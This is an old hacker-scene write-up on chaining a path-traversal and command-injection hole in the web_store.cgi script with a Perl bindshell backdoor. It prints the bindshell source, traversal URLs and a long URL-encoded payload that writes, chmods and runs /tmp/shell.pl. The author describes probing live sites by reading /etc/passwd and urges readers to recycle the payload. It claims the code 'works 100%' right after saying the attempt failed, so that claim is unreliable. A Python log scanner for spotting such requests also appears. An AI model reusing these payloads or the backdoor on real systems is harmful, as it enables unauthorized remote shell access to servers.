Bindshell for WebStore CGI Exploit Analysis
----------------------------------------------
Author's Note:
 
"Some old school combination of bindshell backdoor and cgi exploit." Original author's rights reserved. Compressed and reformatted to a one-page mail!
----------------------------------------------

INTRODUCTION

[d]uden of Hackers Digital Crime proposed the idea of using the BindShell exploit code of van Hauser (THC) in combination with the web_store.cgi exploit to get backdoor access. To read more about the webstore exploit and the original proposal, see the original paper at http://www.h-d-c.org/download/source/webstorecgi.htm.

The paper also indicates that the author of the idea included a little mistake in his UUEncoded URL. This analysis aims to clarify all loopholes in his proposal, present the corrected code and probably give an idea as to how to apply this to current exploits.


CODES

  • webstore cgi exploit

    http://target/cgi-bin/Web_Store/web_store.cgi?page=../../path/filename%00ext

    http://target/cgi-bin/Web_Store/web_store.cgi?page=../../../../../../../../bin/ls%20/etc%00.html%7C

  • van Hauser of THC's bindshell code

    #!/usr/bin/perl
    use Socket;
    $protocol = getprotobyname('tcp');
    socket(S, &PF_INET, &SOCK_STREAM, $protocol) || die "can't create socket\n";
    setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
    # Listen on TCP port 40000 on every interface.
    bind(S, sockaddr_in(40000, INADDR_ANY)) || die "can't bind\n";
    listen(S, 3) || die "can't listen\n";
    while (1)
    {
        # Wait for a client; retry if accept fails.
        YOP: accept (THC, S) || goto YOP;
        if (! ($pid=fork))
        {
            goto BYE if (! defined $pid);
            # Child: attach stdin, stdout and stderr to the client socket, then run a shell.
            open STDIN, ">&THC";
            open STDOUT, ">&THC";
            open STDERR, ">&THC";
            exec "/bin/sh -i" || print THC "couldn't spawn shell\n";
            close THC;
            exit 0;
        }
        else
        {
            # Parent: drop its copy of the client socket and keep listening.
            BYE: close THC;
        }
    }

  • [d]uden's webstore and bindshell combination code with an embedded mistake

    http://target/cgi-bin/Web_Store/web_store.cgi?page=../../../../../../../../bin/echo%20%5C%23%21/usr/bin/perl%20%3E%20/tmp/shell.pl%3B/bin/echo%20require%205.002%5C%3B%20use%20Socket%5C%3B%20%5C%24protocol%20%5C%3D%20getprotobyname%5C%28%5C%27tcp%5C%27%5C%29%5C%3B%20socket%5C%28S%2C%20%5C%26PF%5FINET%2C%20%5C%26SOCK%5FSTREAM%2C%20%5C%24protocol%5C%29%20%5C%7C%5C%7C%20die%20%5C%22can%5C%27t%20create%20socket%5Cn%5C%22%5C%3B%20setsockopt%5C%28S%2C%20SOL%5FSOCKET%2C%20SO%5FREUSEADDR%2C%201%5C%29%5C%3B%20bind%5C%28S%2C%20sockaddr%5Fin%5C%2840000%2C%20INADDR%5FANY%5C%29%5C%29%20%5C%7C%5C%7C%20die%20%5C%22can%5C%27t%20bind%5Cn%5C%22%5C%3B%20listen%5C%28S%2C%203%5C%29%20%5C%7C%5C%7C%20die%20%5C%22can%5C%27t%2 0listen%5Cn%5C%22%5C%3B%20while%20%5C%281%5C%29%20%7B%20YOP:%20accept%20%5C%28THC%2C%20S%5C%29%20%5C%7C%5C%7C%20goto%20YOP%5C%3B%20if%20%5C%28!%20%5C%28%5C%24pid%5C%3Dfork%5C%29%5C%29%20%7B%20goto%20BYE%20if%20%5C%28!%20defined%20%5C%24pid%5C%29%5C%3B%20open%20STDIN%2C%20%20%5C%22%5C%3C%5C%26THC%5C%22%5C%3B%20open%20STDOUT%2C%20%5C%22%5C%3E%5C%26THC%5C%22%5C%3B%20open%20STDERR%2C%20%5C%22%5C%3E%5C%26THC%5C%22%5C%3B%20exec%20%5C%22/bin/sh%20-i%5C%22%20%5C%7C%5C%7C%20print%20THC%20%5C%22couldn%5C%27t%20spawn%20shell%5Cn%5C%22%5C%3B%20close%20THC%5C%3B%20exit%200%5C%3B%7D%20else%20%7BBYE:%20close%20THC%5C%3B%7D%7D%20%3E%20/tmp/shell.pl%3B/bin/chmod%20777%20/tmp/shell.pl%3B/tmp/shell.pl%00.html%7C


    DECODING PROCESS

    The actual decoding was done manually (although it could have been done a lot more easily if I had coded up a Perl script). The manual decoding process involved using a hexadecimal converter together with tables and cut-and-paste commands. hehe! For example, %20 is equal to a space.

    The %3C shown in RED in the code above (the color is lost in this plain-text copy; it is the %3C in the open STDIN part) marks the error in the code. The corrected code is as follows (be reminded that lines that I think wouldn't be that useful are already omitted):

    http://target/cgi-bin/Web_Store/web_store.cgi?page=../../../../../../../../bin/echo%20%5C%23%21/usr/bin/perl%20%3E%20/tmp/shell.pl%3B%20use%20Socket%5C%3B%20%5C%24protocol%20%5C%3D%20getprotobyname%5C%28%5C%27Tcp%5C%27%5C%29%5C%3B%20socket%5C%28S%2C%20%5C%26PF%5FINET%2C%20%5C%26SOCK%5FSTREAM%2C%20%5C%24protocol%5C%29%20%5C%7C%5C%7C%20die%20%5C%22can%5C%27t%20create%20socket%5Cn%5C%22%5C%3B%20setsockopt%5C%28S%2C%20SOL%5FSOCKET%2C%20SO%5FREUSEADDR%2C%201%5C%29%5C%3B%20bind%5C%28S%2C%20sockaddr%5Fin%5C%2840000%2C%20INADDR%5FANY%5C%29%5C%29%20%5C%7C%5C%7C%20die%20%5C%22can%5C%27t%20bind%5Cn%5C%22%5C%3B%20listen%5C%28S%2C%203%5C%29%20%5C%7C%5C%7C%20die%20%5C%22can%5C%27t%20listen%5Cn%5C%22%5C%3B%20while%20%5C%281%5C%29%20%7B%20YOP:%20accept%20%5C%28THC%2C%20S%5C%29%20%5C%7C%5C%7C%20goto%20YOP%5C%3B%20if%20%5C%28!%20%5C%28%5C%24pid%5C%3Dfork%5C%29%5C%29%20%7B%20goto%20BYE%20if%20%5C%28!%20defined%20%5C%24pid%5C%29%5C%3B%20open%20STDIN%2C%20%5C%22%5C%3E%5C%26THC%5C%22%5C%3B%20open%20STDOUT%2C%20%5C%22%5C%3E%5C%26THC%5C%22%5C%3B%20open%20STDERR%2C%20%5C%22%5C%3E%5C%26THC%5C%22%5C%3B%20exec%20%5C%22/bin/sh%20-i%5C%22%20%5C%7C%5C%7C%20print%20THC%20%5C%22couldn%5C%27t%20spawn%20shell%5Cn%5C%22%5C%3B%20close%20THC%5C%3B%20exit%200%5C%3B%7D%20else%20%7BBYE:%20close%20THC%5C%3B%7D%7D%20%3E%20/tmp/shell.pl%3B/bin/chmod%20777%20/tmp/shell.pl%3B/tmp/shell.pl%00.html%7C

    %3C represents a "<" symbol; while
    %3E represents a ">" symbol
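
    The manual decoding described above can be scripted. The following is an added example, not part of the original mail: it percent-decodes the page parameter of web_store.cgi requests found in access-log lines and flags the traits the URLs on this page share (../ traversal, a %00 byte, a trailing %7C pipe). The log lines, the log layout and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Constructed access-log lines (not from a real server); addresses are documentation IPs.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2001:10:00:00 +0000] "GET /cgi-bin/Web_Store/web_store.cgi?page=index.html HTTP/1.0" 200 5120',
    '192.0.2.44 - - [01/Jan/2001:10:02:13 +0000] "GET /cgi-bin/Web_Store/web_store.cgi?page=../../../../../../../../bin/ls%20/etc%00.html%7C HTTP/1.0" 200 812',
    '192.0.2.44 - - [01/Jan/2001:10:02:40 +0000] "GET /cgi-bin/Web_Store/web_store.cgi?page=../../../../etc/passwd%00.html HTTP/1.0" 200 1304',
]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def page_param(line):
    """Percent-decoded bytes of page= in a web_store.cgi request, else None."""
    m = REQUEST_RE.search(line)
    url = urlsplit(m.group(1)) if m else None
    if url is None or not url.path.lower().endswith("/web_store.cgi"):
        return None
    for pair in url.query.split("&"):
        name, _, value = pair.partition("=")
        if name == "page":
            return unquote_to_bytes(value)
    return None

def findings(value):
    """Traits of a decoded page= value that match the requests shown on this page."""
    checks = [
        ("path traversal", b"../" in value or value.startswith(b"/")),
        ("NUL byte", b"\x00" in value),
        ("leading/trailing pipe", value.strip().startswith(b"|") or value.strip().endswith(b"|")),
        ("shell metacharacters", re.search(rb"[;`$<>]", value) is not None),
    ]
    return [name for name, hit in checks if hit]

def scan(lines):
    """Return (line index, decoded value, findings) for each flagged request."""
    hits = []
    for i, line in enumerate(lines):
        value = page_param(line)
        why = findings(value) if value is not None else []
        if why:
            hits.append((i, value, why))
    return hits

if __name__ == "__main__":
    for i, value, why in scan(SAMPLE_LOG):
        print(f"line {i}: {value!r} -> {', '.join(why)}")
```

    Decoding to bytes rather than text keeps the %00 visible as \x00 in the output instead of silently ending the string.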


    ANALYSIS

    In order to test our newfound bindshell-webstore exploit, we must find vulnerable sites first. By trying to read /etc/passwd of the sites that contain web_store.cgi, we arrived at a list of vulnerable sites.


    After obtaining a modest list of vulnerable sites, we now try our bindshell-webstore exploit. The instructions from the original paper stated that "if you try to access this page your browser will run a long long time. Don't worry about that, if it starts reading the page (there will be no output) just try to telnet to the host at port 40000".

    So we go to the URL, wait a lil while and try to telnet the site at port 40000. We should land at a shell, but did we?


    RECOMMENDATION

    If you expected any conclusion, there isn't any. Honestly, I've tried van Hauser's bindshell code on a working shell and it works. But when I try it in combination with the webstore exploit it doesn't seem to work at all. Theoretically, this SHOULD work. But when I try to read the file I made, /tmp/shell.pl, it seems that the file doesn't exist!?

    There are many reasons as to why this is. It could be that the httpd-process user doesn't have any permission to write any file in the /tmp directory. The webstore could have also been upgraded or patched. It could also be that the httpd-process user doesn't have any right to execute scripts.

    There are a lot of possible reasons as to why I was not able to execute this properly. All I can say is that this code can be RECYCLED. For any future exploit which has the same attributes as the webstore exploit, we can just inject this code the same way [d]uden did with the webstore exploit.

    This code works 100%. All credit should go to the people concerned for their idea. I only clarified the mistake for the general masses.

    ----------------------------------------------
    z3r0kul
    R&D Department
    ERROR 404 Development Team
    ----------------------------------------------